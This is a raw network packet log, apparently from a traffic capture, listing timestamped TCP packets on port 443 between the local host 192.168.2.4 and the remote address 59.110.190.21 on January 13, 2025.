Jan 13, 2025 13:54:18.159226894 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.159501076 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.159562111 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.162307024 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.162365913 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.162435055 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.162492037 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.167568922 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.167628050 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.167691946 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.167757034 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.174034119 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.176170111 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.176239967 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.176336050 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.176395893 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.179883003 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.179945946 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.180011988 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.180072069 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.185936928 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.185997963 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.213917017 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.213937998 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.213953972 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.214039087 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.214046001 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.214117050 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.215475082 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.215537071 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.215601921 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.215651035 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.218945026 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.219006062 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.221793890 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.221857071 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.221927881 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.221991062 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.225641012 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.225699902 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.225785971 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.225841999 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.231132984 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.231266022 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.231270075 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.231296062 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.231331110 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.231348991 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.245693922 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.245750904 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.245883942 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.245944023 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.246048927 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.246105909 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.246176958 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.246234894 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.248980999 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.249066114 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.249161959 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.249221087 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.254338980 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.254403114 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.254479885 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.254533052 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.265502930 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.265577078 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.265618086 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.265677929 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.268964052 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.269022942 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.269056082 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.269124031 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.273696899 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.273760080 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.273776054 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.273857117 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.276943922 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.277003050 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.277040958 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.277101040 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.284990072 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.285068989 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.285084009 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.285142899 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.289448977 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.289514065 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.289527893 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.289577961 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.289593935 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.289625883 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.295538902 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.295582056 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.295605898 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.295614004 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.295627117 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.295660019 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.302109003 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.302195072 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.302303076 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.302357912 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.305664062 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.305706024 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.305732965 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.305740118 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.305757999 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.305789948 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.312758923 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.312813044 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.313019037 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.313071012 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.313072920 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.313097000 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.313137054 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.313148022 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.313158035 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.313199043 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.313220978 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.322102070 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.322174072 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.322222948 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.322283030 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.332442045 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.332572937 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.332621098 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.332679033 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.332920074 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.332976103 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.333020926 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.333076000 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.335779905 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.335849047 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.335923910 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.335975885 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.341386080 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.341449976 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.341480017 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.341546059 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.352089882 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.352163076 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.559354067 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.559422970 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.853463888 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.853496075 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853512049 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853578091 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.853585958 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853605032 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853672028 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.853698015 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853737116 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853768110 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853786945 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.853795052 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853841066 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.853849888 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853873968 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853898048 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.853910923 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.853990078 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.853997946 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.854043961 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.854051113 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:18.854083061 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:18.854118109 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.059357882 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.060920000 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.267371893 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.267395973 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267411947 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267501116 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.267508984 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267527103 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267606974 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.267613888 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267627001 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267641068 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267740011 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.267746925 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267762899 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267786026 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267793894 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267921925 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.267929077 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.267975092 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.267981052 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.268038034 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.268074989 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.475336075 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.475397110 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.500624895 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.500641108 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.500694036 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.500699043 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.500880957 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.500888109 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.500906944 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.500926971 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.500952005 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.500957966 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.501032114 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.501168013 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.707400084 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.707489014 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.802716970 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.802741051 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.802767038 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.802835941 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.802858114 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.802891970 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.802905083 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.802928925 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.802953005 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.802963018 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.803054094 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.803076029 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.803107023 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.870074987 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.870094061 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.870125055 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.870147943 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.870265961 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.870297909 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.870341063 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.870390892 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:19.870443106 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:19.870560884 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.075196981 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.075217009 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.075267076 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.075411081 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.121495962 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.121505976 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.121526003 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.121545076 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.121560097 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.121707916 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.121834040 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.121879101 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.327379942 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.327465057 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.494324923 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.494345903 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.494369984 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.494582891 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.538794041 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.538803101 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.538832903 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.538853884 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.539026976 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.539036036 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.539151907 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.539194107 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.539340973 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.747368097 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.751023054 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.907730103 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.907768011 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.907809019 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.907957077 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.948738098 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.948760986 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.948782921 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.948807955 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.949091911 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.949101925 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.949223042 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.949233055 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:20.949320078 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:20.949347973 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.155379057 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.156481981 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.289191961 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.289202929 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.289223909 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.289346933 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.337526083 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.337532043 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.337551117 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.337568045 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.337842941 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.337848902 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.337882042 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.337888002 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.337924004 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.338011026 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.543358088 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.543431997 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.646519899 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.646543980 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.646565914 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.646675110 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.739867926 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.739900112 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.739922047 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.739947081 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.739952087 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.740037918 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.740047932 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.740103960 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:21.740135908 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:21.740230083 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:22.050379038 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:22.159775019 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:22.953104019 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:22.953186035 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:23.140774965 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:23.140820026 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:23.141019106 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:23.141112089 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:23.141119003 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.464121103 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.464189053 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.464623928 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.464629889 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.464785099 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.464787960 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.822017908 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.822068930 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.822087049 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.822102070 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.822119951 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.822149038 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.822201967 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.822251081 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.823036909 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.823092937 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.823122978 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.823170900 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.908535004 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.908633947 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.908752918 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.908761978 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.908799887 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.908900023 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.908956051 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.908994913 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.909038067 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.909048080 CET	443	49766	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:24.909090042 CET	49766	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:24.909173965 CET	443	49766	59.110.190.21	192.168.2.4
